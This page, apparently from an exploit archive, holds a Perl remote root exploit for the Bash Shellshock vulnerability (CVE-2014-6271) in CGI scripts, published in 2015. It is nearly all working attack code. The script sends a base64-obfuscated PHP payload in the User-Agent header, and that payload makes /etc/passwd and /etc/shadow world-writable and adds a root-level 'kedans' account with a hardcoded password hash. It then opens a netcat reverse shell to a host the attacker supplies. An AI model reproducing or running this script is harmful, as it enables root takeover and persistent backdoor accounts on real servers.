facebook facebook twitter rss

Unix v(*) Bash Shellshock (Spoofing & Inject new User) Remote Root Exploit

Author: KedAns-Dz , Published: 17-02-2015

#!/usr/bin/perl


######################################################################
#
# [>] Title : Unix v(*) Bash Shellshock (Spoofing & Inject new User) Remote Root Exploit
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : Unix / Remote
# [+] Cat/Tag : CGI 0Day , Payload Injection , Remote root exploit
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
#
#########################################################################

use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent ->new;
system("cls");

###############    D_x . Made In Algeria . x_Z   ############
print " |===============================================|\n";
print " | * Unix Bash Shellshock - Remote Root 0day     |\n";
print " | - Script Coded By : KedAns-Dz                 |\n";
print " | - E-Mail  : ked-h [at] hotmail.com            |\n";
print " | ------------  Open Source 4 Ever  ----------- |\n";
print " | CVE: 2014-6271 | OSVDB : 112004 | CWE:CWE-119 |\n";
print " | --------------------------------------------- |\n";
print " | Copyright 2015 | Khaled Anseur - Dz Offenders |\n";
print " |===============================================|\n";
print "\n";
#############################################################
print "[1] Enter URL(f.e: http://<target>/cgi-bin/<cgi-0day> ): \n";
chomp(my $TARGET=<STDIN>);


##################################################
# This Payload is basicly bash commands to spoof #
#   /etc/passwd and /etc/shadow to Add new user  #
#  wit' stuid(0,0) /bin/sh exec < root user      #
##################################################
my $Payload = "<?php eval(base64_decode('JGxuc3Bvb2YxID0gYmFzZTY0X2RlY29kZSgiYkc0Z0wyVjBZeTl3WVhOemQyUT0".
"iKTsKJGxuc3Bvb2YyID0gYmFzZTY0X2RlY29kZSgiYkc0Z0wyVjBZeTl6YUdGa2IzYz0iKTsKc3lzdGVtKCRsbnNwb29mMSk7IApzeXN".
"0ZW0oJ2NobW9kIDc3NyBwYXNzd2QnKTsKc3lzdGVtKCdjaG1vZCA3Nzcgc2hhZG93Jyk7CiRmMSA9ICdwYXNzd2QnOyAKJGMxID0gZmls".
"ZV9nZXRfY29udGVudHMoJGYxKTsKJGMxIC49ICJrZWRhbnM6QXo3YUtTUGpYR0N5azowOjA6Oi86L2Jpbi9zaCI7CmZpbGVfcHV0X2Nvbn".
"RlbnRzKCRmMSwgJGMxKTsKJGYyID0gJ3NoYWRvdyc7CiRjMiA9IGZpbGVfZ2V0X2NvbnRlbnRzKCRmMik7CiRjMiAuPSAia2VkYW5zOkF6N".
"2FLU1BqWEdDeWs6MDowOjovOi9iaW4vc2giOwpmaWxlX3B1dF9jb250ZW50cygkZjIsICRjMik7CiRScHcwZCA9IGJhc2U2NF9kZWNvZGUo".
"ImNtVndiR0ZqWlNCbWNtOXRJQzlsZEdNdmNHRnpjM2RrSUR3Z2NHRnpjM2RrIik7CiRSc2hkMCA9IGJhc2U2NF9kZWNvZGUoImNtVndiR0Z".
"qWlNCbWNtOXRJQzlsZEdNdmMyaGhaRzkzSUR3Z2MyaGhaRzkzIik7CnN5c3RlbSgkUnB3MGQpOwpzeXN0ZW0oJFJzaGQwKTs='
)); ?>";
##############################################################################################################

# Spoof /etc/passwd + /etc/shadow and add neW User
my $bash = "() { :;}; /bin/bash -c 'echo ".$Payload." > k3d.php'"; 
# Exec the bomb
my $w00t = "() { :;}; /bin/bash -c 'php k3d.php'"; 
#####################################################################

print "[!] Wait.... ";
sleep(2);
##############

# Inject the PHP file payload via Bash-Shellshock bug
$ua->agent($bash);
$response=$ua->get($TARGET);
if ($response->content =~ /500/){
print "[+] Bash ShellShock successfully exploited\n";
}else{ print "[-] The System maybe no't vulnerable\n";}
########################################################

# Exec the k3d.php on local system ( After Injected )
$ua->agent($w00t);
$response=$ua->get($TARGET);
if ($response->content =~ /500/){
print "[+] Successfully Spoofing /etc/* & Add new root user\n";
}else{ print "[-] The Payload Un- Injected!\n";}
########################################################

# Just Bind the Target <3 NetCat and do what U whant
print "[2] Enter you IP for Bind : \n";
chomp(my $IP=<STDIN>);
print "[3] Enter the Bind Port (ex: 31337): \n";
chomp(my $PORT=<STDIN>);
my $bind = "() { :;}; /bin/bash -c 'nc ".$IP." ".$PORT." -e /bin/sh'";
$ua->agent($bind);
$response=$ua->get($TARGET);
if ($response->content =~ /500/){
print "[+] Successfully Creat Back Connection\n";
print "  - Bind NetCat : $IP & $PORT\n";
print "  - Login wit' : \n";
print "    Username : kedans\n";
print "    Password : kedans\n";
print "  - Infos : kedans:Az7aKSPjXGCyk:0:0::/:/bin/sh \n"; #Thanks to MSF
}else{ print "[-] Exploit Faild!\n";}

####
#  <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
#  Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# >> packetstormsecurity.org * metasploit.com * OWASP & OSVDB <<
####

Like us on Facebook :